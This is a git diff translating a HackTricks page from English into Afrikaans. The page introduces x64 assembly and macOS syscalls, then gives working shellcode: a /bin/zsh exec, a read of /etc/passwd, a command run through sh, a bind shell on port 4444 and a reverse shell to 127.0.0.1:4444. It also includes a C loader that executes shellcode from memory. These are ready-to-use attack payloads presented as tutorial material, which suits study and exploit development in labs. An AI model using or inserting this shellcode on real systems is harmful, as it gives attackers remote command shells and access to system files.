-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md index b9e57b4f1..c6851d6b0 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md @@ -1,123 +1,118 @@ -# Introduction to x64 +# Inleiding tot x64
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Introduction to x64** +## **Inleiding tot x64** -x64, also known as x86-64, is a 64-bit processor architecture predominantly used in desktop and server computing. Originating from the x86 architecture produced by Intel and later adopted by AMD with the name AMD64, it's the prevalent architecture in personal computers and servers today. +x64, ook bekend as x86-64, is 'n 64-bis-processorargitektuur wat hoofsaaklik gebruik word in rekenaars en bedienerrekenaars. Dit het ontstaan uit die x86-argitektuur wat deur Intel vervaardig is en later deur AMD aangeneem is met die naam AMD64. Dit is die heersende argitektuur in persoonlike rekenaars en bedieners vandag. ### **Registers** -x64 expands upon the x86 architecture, featuring **16 general-purpose registers** labeled `rax`, `rbx`, `rcx`, `rdx`, `rbp`, `rsp`, `rsi`, `rdi`, and `r8` through `r15`. Each of these can store a **64-bit** (8-byte) value. These registers also have 32-bit, 16-bit, and 8-bit sub-registers for compatibility and specific tasks. +x64 brei uit op die x86-argitektuur en bevat **16 algemene doelregisters** genaamd `rax`, `rbx`, `rcx`, `rdx`, `rbp`, `rsp`, `rsi`, `rdi`, en `r8` tot `r15`. Elkeen van hierdie registers kan 'n **64-bis** (8-byte) waarde stoor. Hierdie registers het ook 32-bis, 16-bis en 8-bis subregisters vir verenigbaarheid en spesifieke take. -1. **`rax`** - Traditionally used for **return values** from functions. -2. **`rbx`** - Often used as a **base register** for memory operations. -3. **`rcx`** - Commonly used for **loop counters**. -4. **`rdx`** - Used in various roles including extended arithmetic operations. -5. **`rbp`** - **Base pointer** for the stack frame. -6. **`rsp`** - **Stack pointer**, keeping track of the top of the stack. -7. **`rsi`** and **`rdi`** - Used for **source** and **destination** indexes in string/memory operations. -8. **`r8`** to **`r15`** - Additional general-purpose registers introduced in x64. +1. **`rax`** - Tradisioneel gebruik vir **terugkeerwaardes** van funksies. +2. **`rbx`** - Dikwels gebruik as 'n **basisregister** vir geheue-operasies. +3. **`rcx`** - Gewoonlik gebruik vir **lus-tellers**. +4. **`rdx`** - Gebruik vir verskeie rolle, insluitend uitgebreide rekenkundige operasies. +5. **`rbp`** - **Basisaanwyser** vir die stapelraamwerk. +6. **`rsp`** - **Stapelwyser**, hou die boonste gedeelte van die stapel dop. +7. **`rsi`** en **`rdi`** - Gebruik vir **bron** en **bestemming** indekse in string/geheue-operasies. +8. **`r8`** tot **`r15`** - Addisionele algemene doelregisters wat in x64 ingevoer is. -### **Calling Convention** +### **Oproepkonvensie** -The x64 calling convention varies between operating systems. For instance: +Die x64-oproepkonvensie verskil tussen bedryfstelsels. Byvoorbeeld: -* **Windows**: The first **four parameters** are passed in the registers **`rcx`**, **`rdx`**, **`r8`**, and **`r9`**. Further parameters are pushed onto the stack. The return value is in **`rax`**. -* **System V (commonly used in UNIX-like systems)**: The first **six integer or pointer parameters** are passed in registers **`rdi`**, **`rsi`**, **`rdx`**, **`rcx`**, **`r8`**, and **`r9`**. The return value is also in **`rax`**. +* **Windows**: Die eerste **vier parameters** word oorgedra in die registers **`rcx`**, **`rdx`**, **`r8`**, en **`r9`**. Verdere parameters word op die stapel gedruk. Die terugkeerwaarde is in **`rax`**. +* **System V (gewoonlik gebruik in UNIX-soortgelyke stelsels)**: Die eerste **ses heelgetal- of aanwyserparameters** word oorgedra in die registers **`rdi`**, **`rsi`**, **`rdx`**, **`rcx`**, **`r8`**, en **`r9`**. Die terugkeerwaarde is ook in **`rax`**. -If the function has more than six inputs, the **rest will be passed on the stack**. **RSP**, the stack pointer, has to be **16 bytes aligned**, which means that the address it points to must be divisible by 16 before any call happens. This means that normally we would need to ensure that RSP is properly aligned in our shellcode before we make a function call. However, in practice, system calls work many times even if this requirement is not met. +As die funksie meer as ses insette het, sal die **res op die stapel oorgedra word**. **RSP**, die stapelwyser, moet **16 byte uitgelyn** wees, wat beteken dat die adres waarop dit wys, deur 16 deelbaar moet wees voordat enige oproep plaasvind. Dit beteken dat ons normaalweg moet verseker dat RSP behoorlik uitgelyn is in ons skelkode voordat ons 'n funksieoproep maak. In die praktyk werk stelseloproepe egter dikwels selfs as hierdie vereiste nie nagekom word nie. -### Calling Convention in Swift +### Oproepkonvensie in Swift -Swift have its own **calling convention** that can be found in [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64) +Swift het sy eie **oproepkonvensie** wat gevind kan word in [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64) -### **Common Instructions** +### **Gewone Instruksies** -x64 instructions have a rich set, maintaining compatibility with earlier x86 instructions and introducing new ones. +x64-instruksies het 'n ryk stel, wat verenigbaarheid met vorige x86-instruksies handhaaf en nuwes introduceer. -* **`mov`**: **Move** a value from one **register** or **memory location** to another. - * Example: `mov rax, rbx` — Moves the value from `rbx` to `rax`. -* **`push`** and **`pop`**: Push or pop values to/from the **stack**. - * Example: `push rax` — Pushes the value in `rax` onto the stack. - * Example: `pop rax` — Pops the top value from the stack into `rax`. -* **`add`** and **`sub`**: **Addition** and **subtraction** operations. - * Example: `add rax, rcx` — Adds the values in `rax` and `rcx` storing the result in `rax`. -* **`mul`** and **`div`**: **Multiplication** and **division** operations. Note: these have specific behaviors regarding operand usage. -* **`call`** and **`ret`**: Used to **call** and **return from functions**. -* **`int`**: Used to trigger a software **interrupt**. E.g., `int 0x80` was used for system calls in 32-bit x86 Linux. -* **`cmp`**: **Compare** two values and set the CPU's flags based on the result. - * Example: `cmp rax, rdx` — Compares `rax` to `rdx`. -* **`je`, `jne`, `jl`, `jge`, ...**: **Conditional jump** instructions that change control flow based on the results of a previous `cmp` or test. - * Example: After a `cmp rax, rdx` instruction, `je label` — Jumps to `label` if `rax` is equal to `rdx`. -* **`syscall`**: Used for **system calls** in some x64 systems (like modern Unix). -* **`sysenter`**: An optimized **system call** instruction on some platforms. +* **`mov`**: **Beweeg** 'n waarde van die een **register** of **geheueplek** na 'n ander. +* Voorbeeld: `mov rax, rbx` — Beweeg die waarde van `rbx` na `rax`. +* **`push`** en **`pop`**: Druk waardes na/van die **stapel**. +* Voorbeeld: `push rax` — Druk die waarde in `rax` na die stapel. +* Voorbeeld: `pop rax` — Haal die boonste waarde van die stapel na `rax`. +* **`add`** en **`sub`**: **Optel-** en **aftrekkingsoperasies**. +* Voorbeeld: `add rax, rcx` — Tel die waardes in `rax` en `rcx` bymekaar en stoor die resultaat in `rax`. +* **`mul`** en **`div`**: **Vermenigvuldigings-** en **delingsoperasies**. Let op: hierdie het spesifieke gedrag met betrekking tot operandgebruik. +* **`call`** en **`ret`**: Gebruik om funksies **aan te roep** en **terug te keer**. +* **`int`**: Gebruik om 'n sagteware-**onderbreking** te veroorsaak. Byvoorbeeld, `int 0x80` is gebruik vir stelseloproepe in 32-bis x86 Linux. +* **`cmp`**: Vergelyk twee waardes en stel die CPU se vlae in op grond van die resultaat. +* Voorbeeld: `cmp rax, rdx` — Vergelyk `rax` met `rdx`. +* **`je`, `jne`, `jl`, `jge`, ...**: **Voorwaardelike sprong**-instruksies wat beheervloei verander op grond van die resultate van 'n vorige `cmp` of toets. +* Voorbeeld: Na 'n `cmp rax, rdx`-instruksie, `je label` — Spring na `label` as `rax` gelyk is aan `rdx`. +* **`syscall`**: Gebruik vir **stelseloproepe** in sommige x64-stelsels (soos moderne Unix). +* **`sysenter`**: 'n Geoptimeerde **stelseloproep**-instruksie op sommige platforms. -### **Function Prologue** +### **Funksieproloog** -1. **Push the old base pointer**: `push rbp` (saves the caller's base pointer) -2. **Move the current stack pointer to the base pointer**: `mov rbp, rsp` (sets up the new base pointer for the current function) -3. **Allocate space on the stack for local variables**: `sub rsp, ` (where `` is the number of bytes needed) +1. **Druk die ou basisaanwyser na die stapel**: `push rbp` (stoor die basisaanwyser van die aanroeper) +2. **Beweeg die huidige stapelwyser na die basisaanwyser**: `mov rbp, rsp` (stel die nuwe basisaanwyser op vir die huidige funksie) +3. **Ken ruimte toe op die stapel vir plaaslike veranderlikes**: `sub rsp, ` (waar `` die aantal benodigde byte is) -### **Function Epilogue** - -1. **Move the current base pointer to the stack pointer**: `mov rsp, rbp` (deallocate local variables) -2. **Pop the old base pointer off the stack**: `pop rbp` (restores the caller's base pointer) -3. **Return**: `ret` (returns control to the caller) +### **Funksie-epiloog** +1. **Beweeg die huidige basisaanwyser na die stapelwyser**: `mov rsp, rbp` (deallokeer plaaslike veranderlikes) +2. **Haal die ou basisaanwyser van die stapel af**: `pop rbp` (herstel die basisaanwyser van die aanroeper) +3. **Keer terug**: `ret` (gee beheer terug aan die aanroeper) ## macOS ### syscalls -There are different classes of syscalls, you can [**find them here**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/osfmk/mach/i386/syscall\_sw.h)**:** - +Daar is verskillende klasse van syscalls, jy kan [**hulle hier vind**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/osfmk/mach/i386/syscall\_sw.h)**:** ```c #define SYSCALL_CLASS_NONE 0 /* Invalid */ -#define SYSCALL_CLASS_MACH 1 /* Mach */ +#define SYSCALL_CLASS_MACH 1 /* Mach */ #define SYSCALL_CLASS_UNIX 2 /* Unix/BSD */ #define SYSCALL_CLASS_MDEP 3 /* Machine-dependent */ #define SYSCALL_CLASS_DIAG 4 /* Diagnostics */ #define SYSCALL_CLASS_IPC 5 /* Mach IPC */ ``` - -Then, you can find each syscall number [**in this url**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master)**:** - +Dan kan jy elke syscallnommer [**in hierdie url**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master)**:** vind. ```c 0 AUE_NULL ALL { int nosys(void); } { indirect syscall } -1 AUE_EXIT ALL { void exit(int rval); } -2 AUE_FORK ALL { int fork(void); } -3 AUE_NULL ALL { user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); } -4 AUE_NULL ALL { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); } -5 AUE_OPEN_RWTC ALL { int open(user_addr_t path, int flags, int mode); } -6 AUE_CLOSE ALL { int close(int fd); } -7 AUE_WAIT4 ALL { int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); } +1 AUE_EXIT ALL { void exit(int rval); } +2 AUE_FORK ALL { int fork(void); } +3 AUE_NULL ALL { user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); } +4 AUE_NULL ALL { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); } +5 AUE_OPEN_RWTC ALL { int open(user_addr_t path, int flags, int mode); } +6 AUE_CLOSE ALL { int close(int fd); } +7 AUE_WAIT4 ALL { int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); } 8 AUE_NULL ALL { int nosys(void); } { old creat } -9 AUE_LINK ALL { int link(user_addr_t path, user_addr_t link); } -10 AUE_UNLINK ALL { int unlink(user_addr_t path); } +9 AUE_LINK ALL { int link(user_addr_t path, user_addr_t link); } +10 AUE_UNLINK ALL { int unlink(user_addr_t path); } 11 AUE_NULL ALL { int nosys(void); } { old execv } -12 AUE_CHDIR ALL { int chdir(user_addr_t path); } +12 AUE_CHDIR ALL { int chdir(user_addr_t path); } [...] ``` +So om die `open` syscall (**5**) van die **Unix/BSD-klas** te roep, moet jy dit byvoeg: `0x2000000` -So in order to call the `open` syscall (**5**) from the **Unix/BSD class** you need to add it: `0x2000000` +Dus sal die syscall-nommer om open te roep `0x2000005` wees -So, the syscall number to call open would be `0x2000005` +### Shellkodes -### Shellcodes - -To compile: +Om te kompileer: {% code overflow="wrap" %} ```bash @@ -126,13 +121,13 @@ ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/Comm ``` {% endcode %} -To extract the bytes: +Om die bytes te onttrek: {% code overflow="wrap" %} ```bash # Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh for c in $(objdump -d "shell.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do - echo -n '\\x'$c +echo -n '\\x'$c done # Another option @@ -142,8 +137,7 @@ otool -t shell.o | grep 00 | cut -f2 -d$'\t' | sed 's/ /\\x/g' | sed 's/^/\\x/g'
-C code to test the shellcode - +C-kode om die shellcode te toets ```c // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c // gcc loader.c -o loader @@ -157,312 +151,301 @@ int (*sc)(); char shellcode[] = ""; int main(int argc, char **argv) { - printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode)); - - void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); - - if (ptr == MAP_FAILED) { - perror("mmap"); - exit(-1); - } - printf("[+] SUCCESS: mmap\n"); - printf(" |-> Return = %p\n", ptr); - - void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); - printf("[+] SUCCESS: memcpy\n"); - printf(" |-> Return = %p\n", dst); +printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode)); - int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ); +void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); - if (status == -1) { - perror("mprotect"); - exit(-1); - } - printf("[+] SUCCESS: mprotect\n"); - printf(" |-> Return = %d\n", status); +if (ptr == MAP_FAILED) { +perror("mmap"); +exit(-1); +} +printf("[+] SUCCESS: mmap\n"); +printf(" |-> Return = %p\n", ptr); - printf("[>] Trying to execute shellcode...\n"); +void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); +printf("[+] SUCCESS: memcpy\n"); +printf(" |-> Return = %p\n", dst); - sc = ptr; - sc(); - - return 0; +int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ); + +if (status == -1) { +perror("mprotect"); +exit(-1); +} +printf("[+] SUCCESS: mprotect\n"); +printf(" |-> Return = %d\n", status); + +printf("[>] Trying to execute shellcode...\n"); + +sc = ptr; +sc(); + +return 0; } ``` -
-#### Shell +#### Skulp -Taken from [**here**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s) and explained. +Geneem van [**hier**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s) en verduidelik. {% tabs %} -{% tab title="with adr" %} +{% tab title="met adr" %} ```armasm bits 64 global _main _main: - call r_cmd64 - db '/bin/zsh', 0 +call r_cmd64 +db '/bin/zsh', 0 r_cmd64: ; the call placed a pointer to db (argv[2]) - pop rdi ; arg1 from the stack placed by the call to l_cmd64 - xor rdx, rdx ; store null arg3 - push 59 ; put 59 on the stack (execve syscall) - pop rax ; pop it to RAX - bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) - syscall +pop rdi ; arg1 from the stack placed by the call to l_cmd64 +xor rdx, rdx ; store null arg3 +push 59 ; put 59 on the stack (execve syscall) +pop rax ; pop it to RAX +bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) +syscall ``` -{% endtab %} - -{% tab title="with stack" %} +{% tab title="met stapel" %} ```armasm bits 64 global _main _main: - xor rdx, rdx ; zero our RDX - push rdx ; push NULL string terminator - mov rbx, '/bin/zsh' ; move the path into RBX - push rbx ; push the path, to the stack - mov rdi, rsp ; store the stack pointer in RDI (arg1) - push 59 ; put 59 on the stack (execve syscall) - pop rax ; pop it to RAX - bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) - syscall +xor rdx, rdx ; zero our RDX +push rdx ; push NULL string terminator +mov rbx, '/bin/zsh' ; move the path into RBX +push rbx ; push the path, to the stack +mov rdi, rsp ; store the stack pointer in RDI (arg1) +push 59 ; put 59 on the stack (execve syscall) +pop rax ; pop it to RAX +bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) +syscall ``` {% endtab %} {% endtabs %} -#### Read with cat - -The goal is to execute `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, so the second argument (x1) is an array of params (which in memory these means a stack of the addresses). +#### Lees met kat +Die doel is om `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)` uit te voer, so die tweede argument (x1) is 'n reeks van parameters (wat in die geheue 'n stapel van die adresse beteken). ```armasm bits 64 section .text global _main _main: - ; Prepare the arguments for the execve syscall - sub rsp, 40 ; Allocate space on the stack similar to `sub sp, sp, #48` +; Prepare the arguments for the execve syscall +sub rsp, 40 ; Allocate space on the stack similar to `sub sp, sp, #48` - lea rdi, [rel cat_path] ; rdi will hold the address of "/bin/cat" - lea rsi, [rel passwd_path] ; rsi will hold the address of "/etc/passwd" - - ; Create inside the stack the array of args: ["/bin/cat", "/etc/passwd"] - push rsi ; Add "/etc/passwd" to the stack (arg0) - push rdi ; Add "/bin/cat" to the stack (arg1) - - ; Set in the 2nd argument of exec the addr of the array - mov rsi, rsp ; argv=rsp - store RSP's value in RSI +lea rdi, [rel cat_path] ; rdi will hold the address of "/bin/cat" +lea rsi, [rel passwd_path] ; rsi will hold the address of "/etc/passwd" - xor rdx, rdx ; Clear rdx to hold NULL (no environment variables) - - push 59 ; put 59 on the stack (execve syscall) - pop rax ; pop it to RAX - bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) - syscall ; Make the syscall +; Create inside the stack the array of args: ["/bin/cat", "/etc/passwd"] +push rsi ; Add "/etc/passwd" to the stack (arg0) +push rdi ; Add "/bin/cat" to the stack (arg1) + +; Set in the 2nd argument of exec the addr of the array +mov rsi, rsp ; argv=rsp - store RSP's value in RSI + +xor rdx, rdx ; Clear rdx to hold NULL (no environment variables) + +push 59 ; put 59 on the stack (execve syscall) +pop rax ; pop it to RAX +bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) +syscall ; Make the syscall section .data cat_path: db "/bin/cat", 0 passwd_path: db "/etc/passwd", 0 ``` - -#### Invoke command with sh - +#### Roep bevel met sh aan ```armasm bits 64 section .text global _main _main: - ; Prepare the arguments for the execve syscall - sub rsp, 32 ; Create space on the stack +; Prepare the arguments for the execve syscall +sub rsp, 32 ; Create space on the stack - ; Argument array - lea rdi, [rel touch_command] - push rdi ; push &"touch /tmp/lalala" - lea rdi, [rel sh_c_option] - push rdi ; push &"-c" - lea rdi, [rel sh_path] - push rdi ; push &"/bin/sh" +; Argument array +lea rdi, [rel touch_command] +push rdi ; push &"touch /tmp/lalala" +lea rdi, [rel sh_c_option] +push rdi ; push &"-c" +lea rdi, [rel sh_path] +push rdi ; push &"/bin/sh" - ; execve syscall - mov rsi, rsp ; rsi = pointer to argument array - xor rdx, rdx ; rdx = NULL (no env variables) - push 59 ; put 59 on the stack (execve syscall) - pop rax ; pop it to RAX - bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) - syscall +; execve syscall +mov rsi, rsp ; rsi = pointer to argument array +xor rdx, rdx ; rdx = NULL (no env variables) +push 59 ; put 59 on the stack (execve syscall) +pop rax ; pop it to RAX +bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) +syscall _exit: - xor rdi, rdi ; Exit status code 0 - push 1 ; put 1 on the stack (exit syscall) - pop rax ; pop it to RAX - bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) - syscall +xor rdi, rdi ; Exit status code 0 +push 1 ; put 1 on the stack (exit syscall) +pop rax ; pop it to RAX +bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) +syscall section .data sh_path: db "/bin/sh", 0 sh_c_option: db "-c", 0 touch_command: db "touch /tmp/lalala", 0 ``` +#### Bind skulp -#### Bind shell - -Bind shell from [https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) in **port 4444** - +Bind skulp vanaf [https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) in **poort 4444**. ```armasm section .text global _main _main: - ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) - xor rdi, rdi - mul rdi - mov dil, 0x2 - xor rsi, rsi - mov sil, 0x1 - mov al, 0x2 - ror rax, 0x28 - mov r8, rax - mov al, 0x61 - syscall +; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) +xor rdi, rdi +mul rdi +mov dil, 0x2 +xor rsi, rsi +mov sil, 0x1 +mov al, 0x2 +ror rax, 0x28 +mov r8, rax +mov al, 0x61 +syscall - ; struct sockaddr_in { - ; __uint8_t sin_len; - ; sa_family_t sin_family; - ; in_port_t sin_port; - ; struct in_addr sin_addr; - ; char sin_zero[8]; - ; }; - mov rsi, 0xffffffffa3eefdf0 - neg rsi - push rsi - push rsp - pop rsi +; struct sockaddr_in { +; __uint8_t sin_len; +; sa_family_t sin_family; +; in_port_t sin_port; +; struct in_addr sin_addr; +; char sin_zero[8]; +; }; +mov rsi, 0xffffffffa3eefdf0 +neg rsi +push rsi +push rsp +pop rsi - ; bind(host_sockid, &sockaddr, 16) - mov rdi, rax - xor dl, 0x10 - mov rax, r8 - mov al, 0x68 - syscall +; bind(host_sockid, &sockaddr, 16) +mov rdi, rax +xor dl, 0x10 +mov rax, r8 +mov al, 0x68 +syscall - ; listen(host_sockid, 2) - xor rsi, rsi - mov sil, 0x2 - mov rax, r8 - mov al, 0x6a - syscall +; listen(host_sockid, 2) +xor rsi, rsi +mov sil, 0x2 +mov rax, r8 +mov al, 0x6a +syscall - ; accept(host_sockid, 0, 0) - xor rsi, rsi - xor rdx, rdx - mov rax, r8 - mov al, 0x1e - syscall +; accept(host_sockid, 0, 0) +xor rsi, rsi +xor rdx, rdx +mov rax, r8 +mov al, 0x1e +syscall - mov rdi, rax - mov sil, 0x3 +mov rdi, rax +mov sil, 0x3 dup2: - ; dup2(client_sockid, 2) - ; -> dup2(client_sockid, 1) - ; -> dup2(client_sockid, 0) - mov rax, r8 - mov al, 0x5a - sub sil, 1 - syscall - test rsi, rsi - jne dup2 +; dup2(client_sockid, 2) +; -> dup2(client_sockid, 1) +; -> dup2(client_sockid, 0) +mov rax, r8 +mov al, 0x5a +sub sil, 1 +syscall +test rsi, rsi +jne dup2 - ; execve("//bin/sh", 0, 0) - push rsi - mov rdi, 0x68732f6e69622f2f - push rdi - push rsp - pop rdi - mov rax, r8 - mov al, 0x3b - syscall +; execve("//bin/sh", 0, 0) +push rsi +mov rdi, 0x68732f6e69622f2f +push rdi +push rsp +pop rdi +mov rax, r8 +mov al, 0x3b +syscall ``` +#### Omgekeerde Skulp -#### Reverse Shell - -Reverse shell from [https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html](https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html). Reverse shell to **127.0.0.1:4444** - +Omgekeerde skulp vanaf [https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html](https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html). Omgekeerde skulp na **127.0.0.1:4444** ```armasm section .text global _main _main: - ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) - xor rdi, rdi - mul rdi - mov dil, 0x2 - xor rsi, rsi - mov sil, 0x1 - mov al, 0x2 - ror rax, 0x28 - mov r8, rax - mov al, 0x61 - syscall +; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) +xor rdi, rdi +mul rdi +mov dil, 0x2 +xor rsi, rsi +mov sil, 0x1 +mov al, 0x2 +ror rax, 0x28 +mov r8, rax +mov al, 0x61 +syscall - ; struct sockaddr_in { - ; __uint8_t sin_len; - ; sa_family_t sin_family; - ; in_port_t sin_port; - ; struct in_addr sin_addr; - ; char sin_zero[8]; - ; }; - mov rsi, 0xfeffff80a3eefdf0 - neg rsi - push rsi - push rsp - pop rsi +; struct sockaddr_in { +; __uint8_t sin_len; +; sa_family_t sin_family; +; in_port_t sin_port; +; struct in_addr sin_addr; +; char sin_zero[8]; +; }; +mov rsi, 0xfeffff80a3eefdf0 +neg rsi +push rsi +push rsp +pop rsi - ; connect(sockid, &sockaddr, 16) - mov rdi, rax - xor dl, 0x10 - mov rax, r8 - mov al, 0x62 - syscall +; connect(sockid, &sockaddr, 16) +mov rdi, rax +xor dl, 0x10 +mov rax, r8 +mov al, 0x62 +syscall - xor rsi, rsi - mov sil, 0x3 +xor rsi, rsi +mov sil, 0x3 dup2: - ; dup2(sockid, 2) - ; -> dup2(sockid, 1) - ; -> dup2(sockid, 0) - mov rax, r8 - mov al, 0x5a - sub sil, 1 - syscall - test rsi, rsi - jne dup2 +; dup2(sockid, 2) +; -> dup2(sockid, 1) +; -> dup2(sockid, 0) +mov rax, r8 +mov al, 0x5a +sub sil, 1 +syscall +test rsi, rsi +jne dup2 - ; execve("//bin/sh", 0, 0) - push rsi - mov rdi, 0x68732f6e69622f2f - push rdi - push rsp - pop rdi - xor rdx, rdx - mov rax, r8 - mov al, 0x3b - syscall +; execve("//bin/sh", 0, 0) +push rsi +mov rdi, 0x68732f6e69622f2f +push rdi +push rsp +pop rdi +xor rdx, rdx +mov rax, r8 +mov al, 0x3b +syscall ``` -
